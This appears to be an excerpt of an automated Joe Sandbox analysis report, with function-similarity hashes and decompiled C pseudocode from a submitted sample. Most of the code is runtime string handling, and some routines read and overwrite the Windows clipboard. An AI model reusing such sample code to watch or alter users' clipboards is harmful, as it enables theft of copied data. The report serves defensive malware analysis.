                                                                                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: N@
                                                                                      • API String ID: 0-1509896676
                                                                                      • Opcode ID: a4c178f2959c8fc109b92c063548eeff6938ed6270a4e6741330cd0de286e05c
                                                                                      • Instruction ID: effc8b837a5ea556f2a2fcbb52ad8185c589257e672537aa199df46f4d54cfe3
                                                                                      • Opcode Fuzzy Hash: a4c178f2959c8fc109b92c063548eeff6938ed6270a4e6741330cd0de286e05c
                                                                                      • Instruction Fuzzy Hash: C0517D71901626CFCB14CF49C5846EAF7A2FF89304B1AC16AD90A6B366D7749D81CBC4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmp, Offset: 00926000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_926000_file.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                      • Instruction ID: c91f3411a23d7650f06671788179e511fb3fe0dbbcd146631c9e9f71093e0b7f
                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                      • Instruction Fuzzy Hash: 731170763405109FD744DE55EC81FA673EAEB89724B298055EA08CB316E779EC42C760
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313093446.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
                                                                                      • String ID:
                                                                                      • API String ID: 1628550938-0
                                                                                      • Opcode ID: b56b65da4f60a6a326c0cb9374e8be9335bd6e0fc4ceb08c0e3b32af40695ad8
                                                                                      • Instruction ID: f93cd1af6d1d26ca8b18173b0ebd7c3d2b45a81ca00d6a02c9e8e9d3a0501466
                                                                                      • Opcode Fuzzy Hash: b56b65da4f60a6a326c0cb9374e8be9335bd6e0fc4ceb08c0e3b32af40695ad8
                                                                                      • Instruction Fuzzy Hash: AA118E71940701AAD7209F6ADC45B9ABBE0AF44318F10893FE499B22E2DB7899418F5C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • __getptd.LIBCMT ref: 00409CDF
                                                                                        • Part of subcall function 00409502: __getptd_noexit.LIBCMT ref: 00409505
                                                                                        • Part of subcall function 00409502: __amsg_exit.LIBCMT ref: 00409512
                                                                                      • __getptd.LIBCMT ref: 00409CED
                                                                                      • __getptd.LIBCMT ref: 00409CFB
                                                                                      • __getptd.LIBCMT ref: 00409D06
                                                                                        • Part of subcall function 00409DD3: __getptd.LIBCMT ref: 00409DE2
                                                                                        • Part of subcall function 00409DD3: __getptd.LIBCMT ref: 00409DF0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313093446.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                      • String ID:
                                                                                      • API String ID: 803148776-0
                                                                                      • Opcode ID: 35e86ce1ce766e774da25a462e9e60ffe04426c690f12f83b7537e6d97924b4f
                                                                                      • Instruction ID: 2e5c0c84f906de6ebedcd972e97fb1431e1b90fcbf32cf14b8fdff08d1c31a5e
                                                                                      • Opcode Fuzzy Hash: 35e86ce1ce766e774da25a462e9e60ffe04426c690f12f83b7537e6d97924b4f
                                                                                      • Instruction Fuzzy Hash: 1E11DAB1D00309EFDB01EFA5C846AED7BB0FF44318F14846AF855A7292DB3899119F58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • __getptd.LIBCMT ref: 0040E67B
                                                                                        • Part of subcall function 00409502: __getptd_noexit.LIBCMT ref: 00409505
                                                                                        • Part of subcall function 00409502: __amsg_exit.LIBCMT ref: 00409512
                                                                                      • __getptd.LIBCMT ref: 0040E692
                                                                                      • __amsg_exit.LIBCMT ref: 0040E6A0
                                                                                      • __lock.LIBCMT ref: 0040E6B0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313093446.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                      • String ID:
                                                                                      • API String ID: 3521780317-0
                                                                                      • Opcode ID: 89bbee23413178c8572bb6731adb4896311da6da50f3830ae8b28d2d5831608f
                                                                                      • Instruction ID: 4809ae6cc041877cf456a476a8e48e7b82f09708c37ede7bb4110efadd86eddf
                                                                                      • Opcode Fuzzy Hash: 89bbee23413178c8572bb6731adb4896311da6da50f3830ae8b28d2d5831608f
                                                                                      • Instruction Fuzzy Hash: 3FF04F32A40704ABD621AB67980674E32A0AF40714F944D3FE541B62D2CB7D98619F9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • __getptd.LIBCMT ref: 00409DE2
                                                                                        • Part of subcall function 00409502: __getptd_noexit.LIBCMT ref: 00409505
                                                                                        • Part of subcall function 00409502: __amsg_exit.LIBCMT ref: 00409512
                                                                                      • __getptd.LIBCMT ref: 00409DF0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313093446.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                      • String ID: csm
                                                                                      • API String ID: 803148776-1018135373
                                                                                      • Opcode ID: 8dc7bffffcca348b6b6a1b783be25f4cfb3f8c3ee81cae991b85bc2400b5b1c9
                                                                                      • Instruction ID: 0508ab40e8a15f673cc0f332d9f030fb70231b9eeccf98ceee51e49ddacbe831
                                                                                      • Opcode Fuzzy Hash: 8dc7bffffcca348b6b6a1b783be25f4cfb3f8c3ee81cae991b85bc2400b5b1c9
                                                                                      • Instruction Fuzzy Hash: 150128368002059ACF39DF26C444AAEB3B5AF10311F54483FE041B62D2CB38DD90CB89
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 47%
                                                                                      			E00402830(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                      				intOrPtr _v0;
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				struct HWND__* _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				signed int _v36;
                                                                                      				struct HWND__* _v40;
                                                                                      				struct HWND__* _v44;
                                                                                      				signed int _v48;
                                                                                      				signed int _v52;
                                                                                      				intOrPtr _v56;
                                                                                      				signed int _v60;
                                                                                      				intOrPtr _v64;
                                                                                      				char _v100;
                                                                                      				signed int _v104;
                                                                                      				intOrPtr _v132;
                                                                                      				signed int _t109;
                                                                                      				signed int _t126;
                                                                                      				void* _t127;
                                                                                      				signed int _t130;
                                                                                      				signed int _t132;
                                                                                      				signed int _t138;
                                                                                      				signed int _t139;
                                                                                      				signed int _t141;
                                                                                      				signed int _t149;
                                                                                      				signed int _t151;
                                                                                      				signed int _t152;
                                                                                      				signed int _t154;
                                                                                      				signed int _t162;
                                                                                      				signed int _t165;
                                                                                      				signed int _t173;
                                                                                      				signed int _t176;
                                                                                      				signed int _t177;
                                                                                      				signed int _t181;
                                                                                      				signed int _t182;
                                                                                      				unsigned int _t184;
                                                                                      				void* _t185;
                                                                                      				signed int _t199;
                                                                                      				signed int _t201;
                                                                                      				void* _t203;
                                                                                      				signed int _t206;
                                                                                      				signed int _t210;
                                                                                      				void* _t211;
                                                                                      				int _t213;
                                                                                      				signed int _t217;
                                                                                      				signed int _t221;
                                                                                      				signed int _t224;
                                                                                      				intOrPtr _t228;
                                                                                      				intOrPtr _t229;
                                                                                      				signed int _t235;
                                                                                      				struct HWND__* _t239;
                                                                                      				int* _t240;
                                                                                      				struct HWND__* _t242;
                                                                                      				void* _t247;
                                                                                      				signed int _t250;
                                                                                      				signed int _t251;
                                                                                      				void* _t254;
                                                                                      				void* _t255;
                                                                                      				void* _t258;
                                                                                      				signed int _t261;
                                                                                      				signed int _t262;
                                                                                      				signed int _t264;
                                                                                      				signed int _t269;
                                                                                      				void* _t270;
                                                                                      				signed int _t273;
                                                                                      				intOrPtr _t275;
                                                                                      				void* _t276;
                                                                                      				signed int _t281;
                                                                                      				void* _t284;
                                                                                      				void* _t285;
                                                                                      				void* _t286;
                                                                                      				signed int _t288;
                                                                                      				signed int _t290;
                                                                                      				void* _t296;
                                                                                      				void* _t297;
                                                                                      				void* _t298;
                                                                                      				signed int _t299;
                                                                                      
                                                                                      				_t268 = __esi;
                                                                                      				_t249 = __edx;
                                                                                      				_t209 = __ebx;
                                                                                      				_t284 = _t296;
                                                                                      				_t297 = _t296 - 8;
                                                                                      				_push(__edi);
                                                                                      				_t254 = _a8;
                                                                                      				_t109 = __ecx;
                                                                                      				_t221 = _a4;
                                                                                      				_v8 = __ecx;
                                                                                      				_v12 = _t221;
                                                                                      				if(_t254 > 0x7fffffff) {
                                                                                      					E00401BD0(__ebx, _t221, __edx);
                                                                                      					goto L15;
                                                                                      				} else {
                                                                                      					 *(__ecx + 0x14) = 0xf;
                                                                                      					if(_t254 >= 0x10) {
                                                                                      						_push(__ebx);
                                                                                      						_push(__esi);
                                                                                      						_t281 = _t254 | 0x0000000f;
                                                                                      						__eflags = _t281 - 0x7fffffff;
                                                                                      						if(_t281 <= 0x7fffffff) {
                                                                                      							__eflags = _t281 - 0x16;
                                                                                      							_t268 =  <  ? 0x16 : _t281;
                                                                                      							_t221 = _t268 + 1;
                                                                                      							__eflags = _t221 - 0x1000;
                                                                                      							if(_t221 < 0x1000) {
                                                                                      								__eflags = _t221;
                                                                                      								if(__eflags == 0) {
                                                                                      									_t217 = 0;
                                                                                      									__eflags = 0;
                                                                                      								} else {
                                                                                      									_t217 = E0041362C(__ebx, _t254, _t268, __eflags, _t221);
                                                                                      									_t297 = _t297 + 4;
                                                                                      									_t109 = _v8;
                                                                                      								}
                                                                                      								goto L13;
                                                                                      							} else {
                                                                                      								_t11 = _t221 + 0x23; // 0x23
                                                                                      								_t205 = _t11;
                                                                                      								__eflags = _t11 - _t221;
                                                                                      								if(__eflags <= 0) {
                                                                                      									L15:
                                                                                      									E00401B30();
                                                                                      									goto L16;
                                                                                      								} else {
                                                                                      									goto L5;
                                                                                      								}
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t268 = 0x7fffffff;
                                                                                      							_t205 = 0xffffffff80000023;
                                                                                      							__eflags = 0x80000000;
                                                                                      							L5:
                                                                                      							_t206 = E0041362C(_t209, _t254, _t268, __eflags, _t205);
                                                                                      							_t297 = _t297 + 4;
                                                                                      							__eflags = _t206;
                                                                                      							if(_t206 == 0) {
                                                                                      								L16:
                                                                                      								E0041805F(_t209, _t221, _t249);
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								_push(_t284);
                                                                                      								_t285 = _t297;
                                                                                      								_t298 = _t297 - 0x10;
                                                                                      								_push(_t209);
                                                                                      								_t210 = _t221;
                                                                                      								_v32 = _v0;
                                                                                      								_t222 = 0x7fffffff;
                                                                                      								_push(_t268);
                                                                                      								_t250 =  *((intOrPtr*)(_t210 + 0x10));
                                                                                      								_t269 = _v8;
                                                                                      								_v20 = _t250;
                                                                                      								_push(_t254);
                                                                                      								__eflags = 0x7fffffff - _t250 - _t269;
                                                                                      								if(0x7fffffff - _t250 < _t269) {
                                                                                      									E00401BD0(_t210, 0x7fffffff, _t250);
                                                                                      									goto L38;
                                                                                      								} else {
                                                                                      									_t182 = _t250 + _t269;
                                                                                      									_t269 =  *(_t210 + 0x14);
                                                                                      									_v16 = _t182;
                                                                                      									_t261 = _t182 | 0x0000000f;
                                                                                      									_v20 = _t269;
                                                                                      									__eflags = _t261 - 0x7fffffff;
                                                                                      									if(_t261 <= 0x7fffffff) {
                                                                                      										_t184 = _t269 >> 1;
                                                                                      										_t222 = 0x7fffffff - _t184;
                                                                                      										__eflags = _t269 - _t222;
                                                                                      										if(_t269 <= _t222) {
                                                                                      											_t185 = _t184 + _t269;
                                                                                      											__eflags = _t261 - _t185;
                                                                                      											_t254 =  <  ? _t185 : _t261;
                                                                                      											_t29 = _t254 + 1; // 0x80000000
                                                                                      											_t222 = _t29;
                                                                                      											__eflags = _t222 - 0x1000;
                                                                                      											if(_t222 < 0x1000) {
                                                                                      												__eflags = _t222;
                                                                                      												if(__eflags == 0) {
                                                                                      													_t269 = 0;
                                                                                      													__eflags = 0;
                                                                                      												} else {
                                                                                      													_t199 = E0041362C(_t210, _t254, _t269, __eflags, _t222);
                                                                                      													_t250 = _v12;
                                                                                      													_t298 = _t298 + 4;
                                                                                      													_t269 = _t199;
                                                                                      												}
                                                                                      												goto L31;
                                                                                      											} else {
                                                                                      												_t30 = _t222 + 0x23; // 0x80000023
                                                                                      												_t200 = _t30;
                                                                                      												__eflags = _t30 - _t222;
                                                                                      												if(__eflags <= 0) {
                                                                                      													L38:
                                                                                      													E00401B30();
                                                                                      													goto L39;
                                                                                      												} else {
                                                                                      													goto L21;
                                                                                      												}
                                                                                      											}
                                                                                      										} else {
                                                                                      											_t254 = 0x7fffffff;
                                                                                      											goto L20;
                                                                                      										}
                                                                                      									} else {
                                                                                      										_t254 = 0x7fffffff;
                                                                                      										L20:
                                                                                      										_t200 = 0xffffffff80000023;
                                                                                      										__eflags = 0x80000000;
                                                                                      										L21:
                                                                                      										_t201 = E0041362C(_t210, _t254, _t269, __eflags, _t200);
                                                                                      										_t298 = _t298 + 4;
                                                                                      										__eflags = _t201;
                                                                                      										if(_t201 == 0) {
                                                                                      											L39:
                                                                                      											E0041805F(_t210, _t222, _t250);
                                                                                      											asm("int3");
                                                                                      											asm("int3");
                                                                                      											asm("int3");
                                                                                      											asm("int3");
                                                                                      											asm("int3");
                                                                                      											asm("int3");
                                                                                      											_push(_t285);
                                                                                      											_t286 = _t298;
                                                                                      											_t299 = _t298 - 0x10;
                                                                                      											_t251 = _v24;
                                                                                      											asm("xorps xmm0, xmm0");
                                                                                      											_push(_t210);
                                                                                      											_t211 = _t222;
                                                                                      											_v56 = _v28;
                                                                                      											_t224 = _v16 + _t251;
                                                                                      											_push(_t269);
                                                                                      											_t270 = 0xf;
                                                                                      											_v48 = _t251;
                                                                                      											_v60 = _v20;
                                                                                      											_v52 = _t224;
                                                                                      											asm("movups [ebx], xmm0");
                                                                                      											 *(_t211 + 0x10) = 0;
                                                                                      											 *(_t211 + 0x14) = 0;
                                                                                      											_push(_t254);
                                                                                      											_t255 = _t211;
                                                                                      											__eflags = _t224 - 0xf;
                                                                                      											if(_t224 <= 0xf) {
                                                                                      												L52:
                                                                                      												 *(_t211 + 0x10) = _t224;
                                                                                      												 *(_t211 + 0x14) = _t270;
                                                                                      												E00414BF0(_t255, _v24, _t251);
                                                                                      												__eflags = _t255 + _v16;
                                                                                      												E00414BF0(_t255 + _v16, _v28, _a16);
                                                                                      												 *((char*)(_t255 + _v20)) = 0;
                                                                                      												return _t211;
                                                                                      											} else {
                                                                                      												_t273 = _t224 | 0x0000000f;
                                                                                      												__eflags = _t273 - 0x7fffffff;
                                                                                      												if(_t273 <= 0x7fffffff) {
                                                                                      													__eflags = _t273 - 0x16;
                                                                                      													_t270 =  <  ? 0x16 : _t273;
                                                                                      													_t126 = _t270 + 1;
                                                                                      													__eflags = _t126 - 0x1000;
                                                                                      													if(_t126 < 0x1000) {
                                                                                      														__eflags = _t126;
                                                                                      														if(__eflags == 0) {
                                                                                      															_t255 = 0;
                                                                                      															__eflags = 0;
                                                                                      														} else {
                                                                                      															_t127 = E0041362C(_t211, _t255, _t270, __eflags, _t126);
                                                                                      															_t224 = _v20;
                                                                                      															_t299 = _t299 + 4;
                                                                                      															_t251 = _v16;
                                                                                      															_t255 = _t127;
                                                                                      														}
                                                                                      														goto L51;
                                                                                      													} else {
                                                                                      														_t65 = _t126 + 0x23; // 0x23
                                                                                      														_t227 = _t65;
                                                                                      														__eflags = _t65 - _t126;
                                                                                      														if(__eflags <= 0) {
                                                                                      															E00401B30();
                                                                                      															goto L54;
                                                                                      														} else {
                                                                                      															goto L43;
                                                                                      														}
                                                                                      													}
                                                                                      												} else {
                                                                                      													_t270 = 0x7fffffff;
                                                                                      													_t227 = 0xffffffff80000023;
                                                                                      													__eflags = 0x80000000;
                                                                                      													L43:
                                                                                      													_t181 = E0041362C(_t211, _t255, _t270, __eflags, _t227);
                                                                                      													_t299 = _t299 + 4;
                                                                                      													__eflags = _t181;
                                                                                      													if(_t181 == 0) {
                                                                                      														L54:
                                                                                      														E0041805F(_t211, _t227, _t251);
                                                                                      														asm("int3");
                                                                                      														asm("int3");
                                                                                      														asm("int3");
                                                                                      														asm("int3");
                                                                                      														asm("int3");
                                                                                      														asm("int3");
                                                                                      														asm("int3");
                                                                                      														asm("int3");
                                                                                      														_push(_t286);
                                                                                      														_t288 = _t299;
                                                                                      														_push(_t211);
                                                                                      														_push(_t270);
                                                                                      														_push(_t255);
                                                                                      														_t130 = OpenClipboard(0);
                                                                                      														__eflags = _t130;
                                                                                      														if(_t130 == 0) {
                                                                                      															L67:
                                                                                      															_t213 = 0;
                                                                                      															__eflags = 0;
                                                                                      														} else {
                                                                                      															_t165 = EmptyClipboard();
                                                                                      															__eflags = _t165;
                                                                                      															if(_t165 != 0) {
                                                                                      																_t255 = GlobalAlloc(0x2000, _a8 + 1);
                                                                                      																__eflags = _t255;
                                                                                      																if(_t255 != 0) {
                                                                                      																	_t270 = GlobalLock(_t255);
                                                                                      																	__eflags = _t270;
                                                                                      																	if(_t270 != 0) {
                                                                                      																		__eflags = _a12 - 0x10;
                                                                                      																		_t244 =  >=  ? _v8 :  &_v8;
                                                                                      																		E00414BF0(_t270,  >=  ? _v8 :  &_v8, _a8 + 1);
                                                                                      																		_t299 = _t299 + 0xc;
                                                                                      																		_t173 = GlobalUnlock(_t255);
                                                                                      																		__eflags = _t173;
                                                                                      																		if(_t173 == 0) {
                                                                                      																			L66:
                                                                                      																			CloseClipboard();
                                                                                      																			GlobalFree(_t270);
                                                                                      																			goto L67;
                                                                                      																		} else {
                                                                                      																			_t176 = SetClipboardData(1, _t255);
                                                                                      																			__eflags = _t176;
                                                                                      																			if(_t176 == 0) {
                                                                                      																				goto L66;
                                                                                      																			} else {
                                                                                      																				_t177 = CloseClipboard();
                                                                                      																				__eflags = _t177;
                                                                                      																				if(_t177 == 0) {
                                                                                      																					goto L67;
                                                                                      																				} else {
                                                                                      																					_t213 = 1;
                                                                                      																				}
                                                                                      																			}
                                                                                      																		}
                                                                                      																	} else {
                                                                                      																		CloseClipboard();
                                                                                      																		goto L67;
                                                                                      																	}
                                                                                      																} else {
                                                                                      																	CloseClipboard();
                                                                                      																	goto L67;
                                                                                      																}
                                                                                      															} else {
                                                                                      																CloseClipboard();
                                                                                      																goto L67;
                                                                                      															}
                                                                                      														}
                                                                                      														_t228 = _a12;
                                                                                      														__eflags = _t228 - 0x10;
                                                                                      														if(_t228 < 0x10) {
                                                                                      															L72:
                                                                                      															return _t213;
                                                                                      														} else {
                                                                                      															_t252 = _v8;
                                                                                      															_t229 = _t228 + 1;
                                                                                      															_t132 = _v8;
                                                                                      															__eflags = _t229 - 0x1000;
                                                                                      															if(_t229 < 0x1000) {
                                                                                      																L71:
                                                                                      																_push(_t229);
                                                                                      																E004138AD(_t252);
                                                                                      																goto L72;
                                                                                      															} else {
                                                                                      																_t252 =  *(_t132 - 4);
                                                                                      																_t229 = _t229 + 0x23;
                                                                                      																__eflags = _t132 - _t252 + 0xfffffffc - 0x1f;
                                                                                      																if(_t132 - _t252 + 0xfffffffc > 0x1f) {
                                                                                      																	E0041805F(_t213, _t229, _t252);
                                                                                      																	asm("int3");
                                                                                      																	asm("int3");
                                                                                      																	asm("int3");
                                                                                      																	asm("int3");
                                                                                      																	asm("int3");
                                                                                      																	asm("int3");
                                                                                      																	asm("int3");
                                                                                      																	_push(_t288);
                                                                                      																	_t290 = _t299;
                                                                                      																	_push(0xffffffff);
                                                                                      																	_push(0x43145d);
                                                                                      																	_push( *[fs:0x0]);
                                                                                      																	_t138 =  *0x443048; // 0x9900ec21
                                                                                      																	_t139 = _t138 ^ _t290;
                                                                                      																	_v104 = _t139;
                                                                                      																	_push(_t270);
                                                                                      																	_push(_t255);
                                                                                      																	_push(_t139);
                                                                                      																	 *[fs:0x0] =  &_v100;
                                                                                      																	_t275 = _t229;
                                                                                      																	_v132 = _t275;
                                                                                      																	_v132 = _t275;
                                                                                      																	_t141 = OpenClipboard(0);
                                                                                      																	__eflags = _t141;
                                                                                      																	if(_t141 == 0) {
                                                                                      																		L77:
                                                                                      																		asm("xorps xmm0, xmm0");
                                                                                      																		asm("movups [esi], xmm0");
                                                                                      																		_push(0);
                                                                                      																		 *(_t275 + 0x10) = 0;
                                                                                      																		_push(0x43e90c);
                                                                                      																		 *(_t275 + 0x14) = 0;
                                                                                      																		E00402830(_t213, _t275, _t252, _t255, _t275);
                                                                                      																		goto L92;
                                                                                      																	} else {
                                                                                      																		_t255 = GetClipboardData(1);
                                                                                      																		__eflags = _t255;
                                                                                      																		if(_t255 != 0) {
                                                                                      																			_t252 = GlobalLock(_t255);
                                                                                      																			__eflags = _t252;
                                                                                      																			if(_t252 == 0) {
                                                                                      																				goto L76;
                                                                                      																			} else {
                                                                                      																				_t235 = _t252;
                                                                                      																				_v44 = 0;
                                                                                      																				asm("xorps xmm0, xmm0");
                                                                                      																				_v40 = 0;
                                                                                      																				asm("movups [ebp-0x28], xmm0");
                                                                                      																				_t92 = _t235 + 1; // 0x1
                                                                                      																				_v64 = _t92;
                                                                                      																				do {
                                                                                      																					_t149 =  *_t235;
                                                                                      																					_t235 = _t235 + 1;
                                                                                      																					__eflags = _t149;
                                                                                      																				} while (_t149 != 0);
                                                                                      																				_push(_t235 - _v64);
                                                                                      																				_push(_t252);
                                                                                      																				E00402830(_t213,  &_v60, _t252, _t255, _t275);
                                                                                      																				_v24 = 0;
                                                                                      																				_t151 = GlobalUnlock(_t255);
                                                                                      																				__eflags = _t151;
                                                                                      																				if(_t151 != 0) {
                                                                                      																					_t152 = CloseClipboard();
                                                                                      																					asm("xorps xmm0, xmm0");
                                                                                      																					asm("movups [esi], xmm0");
                                                                                      																					 *(_t275 + 0x10) = 0;
                                                                                      																					 *(_t275 + 0x14) = 0;
                                                                                      																					__eflags = _t152;
                                                                                      																					if(_t152 != 0) {
                                                                                      																						asm("movups xmm0, [ebp-0x28]");
                                                                                      																						asm("movups [esi], xmm0");
                                                                                      																						asm("movq xmm0, [ebp-0x18]");
                                                                                      																						asm("movq [esi+0x10], xmm0");
                                                                                      																						goto L92;
                                                                                      																					} else {
                                                                                      																						_push(_t152);
                                                                                      																						_push(0x43e90c);
                                                                                      																						E00402830(_t213, _t275, _t252, _t255, _t275);
                                                                                      																						_t239 = _v40;
                                                                                      																						__eflags = _t239 - 0x10;
                                                                                      																						if(_t239 < 0x10) {
                                                                                      																							goto L92;
                                                                                      																						} else {
                                                                                      																							_t252 = _v60;
                                                                                      																							_t240 = _t239 + 1;
                                                                                      																							_t154 = _v60;
                                                                                      																							__eflags = _t240 - 0x1000;
                                                                                      																							if(_t240 < 0x1000) {
                                                                                      																								goto L85;
                                                                                      																							} else {
                                                                                      																								_t252 =  *(_t154 - 4);
                                                                                      																								_t240 =  &(_t240[8]);
                                                                                      																								__eflags = _t154 - _t252 + 0xfffffffc - 0x1f;
                                                                                      																								if(_t154 - _t252 + 0xfffffffc > 0x1f) {
                                                                                      																									goto L93;
                                                                                      																								} else {
                                                                                      																									goto L85;
                                                                                      																								}
                                                                                      																							}
                                                                                      																						}
                                                                                      																					}
                                                                                      																				} else {
                                                                                      																					CloseClipboard();
                                                                                      																					asm("xorps xmm0, xmm0");
                                                                                      																					_push(0);
                                                                                      																					asm("movups [esi], xmm0");
                                                                                      																					_push(0x43e90c);
                                                                                      																					 *(_t275 + 0x10) = 0;
                                                                                      																					 *(_t275 + 0x14) = 0;
                                                                                      																					E00402830(_t213, _t275, _t252, _t255, _t275);
                                                                                      																					_t242 = _v40;
                                                                                      																					__eflags = _t242 - 0x10;
                                                                                      																					if(_t242 < 0x10) {
                                                                                      																						L92:
                                                                                      																						 *[fs:0x0] = _v32;
                                                                                      																						_pop(_t258);
                                                                                      																						_pop(_t276);
                                                                                      																						__eflags = _v36 ^ _t290;
                                                                                      																						return E0041361E(_t275, _t213, _v36 ^ _t290, _t252, _t258, _t276);
                                                                                      																					} else {
                                                                                      																						_t252 = _v60;
                                                                                      																						_t240 =  &(_t242->i);
                                                                                      																						_t162 = _v60;
                                                                                      																						__eflags = _t240 - 0x1000;
                                                                                      																						if(_t240 < 0x1000) {
                                                                                      																							L85:
                                                                                      																							_push(_t240);
                                                                                      																							E004138AD(_t252);
                                                                                      																							goto L92;
                                                                                      																						} else {
                                                                                      																							_t252 =  *(_t162 - 4);
                                                                                      																							_t240 =  &(_t240[8]);
                                                                                      																							__eflags = _t162 - _t252 + 0xfffffffc - 0x1f;
                                                                                      																							if(_t162 - _t252 + 0xfffffffc > 0x1f) {
                                                                                      																								L93:
                                                                                      																								E0041805F(_t213, _t240, _t252);
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								asm("int3");
                                                                                      																								return 0x444f38;
                                                                                      																							} else {
                                                                                      																								goto L85;
                                                                                      																							}
                                                                                      																						}
                                                                                      																					}
                                                                                      																				}
                                                                                      																			}
                                                                                      																		} else {
                                                                                      																			L76:
                                                                                      																			CloseClipboard();
                                                                                      																			goto L77;
                                                                                      																		}
                                                                                      																	}
                                                                                      																} else {
                                                                                      																	goto L71;
                                                                                      																}
                                                                                      															}
                                                                                      														}
                                                                                      													} else {
                                                                                      														_t224 = _v20;
                                                                                      														_t61 = _t181 + 0x23; // 0x23
                                                                                      														_t251 = _v16;
                                                                                      														_t255 = _t61 & 0xffffffe0;
                                                                                      														 *(_t255 - 4) = _t181;
                                                                                      														L51:
                                                                                      														 *_t211 = _t255;
                                                                                      														goto L52;
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      										} else {
                                                                                      											_t250 = _v12;
                                                                                      											_t27 = _t201 + 0x23; // 0x23
                                                                                      											_t269 = _t27 & 0xffffffe0;
                                                                                      											 *(_t269 - 4) = _t201;
                                                                                      											L31:
                                                                                      											 *((intOrPtr*)(_t210 + 0x10)) = _v16;
                                                                                      											 *(_t210 + 0x14) = _t254;
                                                                                      											_t262 = _t269 + _t250;
                                                                                      											_v16 = _t262;
                                                                                      											__eflags = _v20 - 0x10;
                                                                                      											_v12 = _a12 + _t262;
                                                                                      											_push(_t250);
                                                                                      											if(_v20 < 0x10) {
                                                                                      												_push(_t210);
                                                                                      												_push(_t269);
                                                                                      												E00414BF0();
                                                                                      												E00414BF0(_t262, _v24, _a12);
                                                                                      												 *_v12 = 0;
                                                                                      												 *_t210 = _t269;
                                                                                      												return _t210;
                                                                                      											} else {
                                                                                      												_t264 =  *_t210;
                                                                                      												_push(_t264);
                                                                                      												_push(_t269);
                                                                                      												E00414BF0();
                                                                                      												E00414BF0(_v16, _v24, _a12);
                                                                                      												_t298 = _t298 + 0x18;
                                                                                      												_t247 = _v20 + 1;
                                                                                      												 *_v12 = 0;
                                                                                      												__eflags = _t247 - 0x1000;
                                                                                      												if(_t247 < 0x1000) {
                                                                                      													L35:
                                                                                      													_push(_t247);
                                                                                      													E004138AD(_t264);
                                                                                      													 *_t210 = _t269;
                                                                                      													return _t210;
                                                                                      												} else {
                                                                                      													_t250 =  *((intOrPtr*)(_t264 - 4));
                                                                                      													_t222 = _t247 + 0x23;
                                                                                      													_t254 = _t264 - _t250;
                                                                                      													_t46 = _t254 - 4; // 0x7ffffffb
                                                                                      													__eflags = _t46 - 0x1f;
                                                                                      													if(_t46 > 0x1f) {
                                                                                      														goto L39;
                                                                                      													} else {
                                                                                      														_t264 = _t250;
                                                                                      														goto L35;
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t7 = _t206 + 0x23; // 0x23
                                                                                      								_t217 = _t7 & 0xffffffe0;
                                                                                      								 *(_t217 - 4) = _t206;
                                                                                      								_t109 = _v8;
                                                                                      								L13:
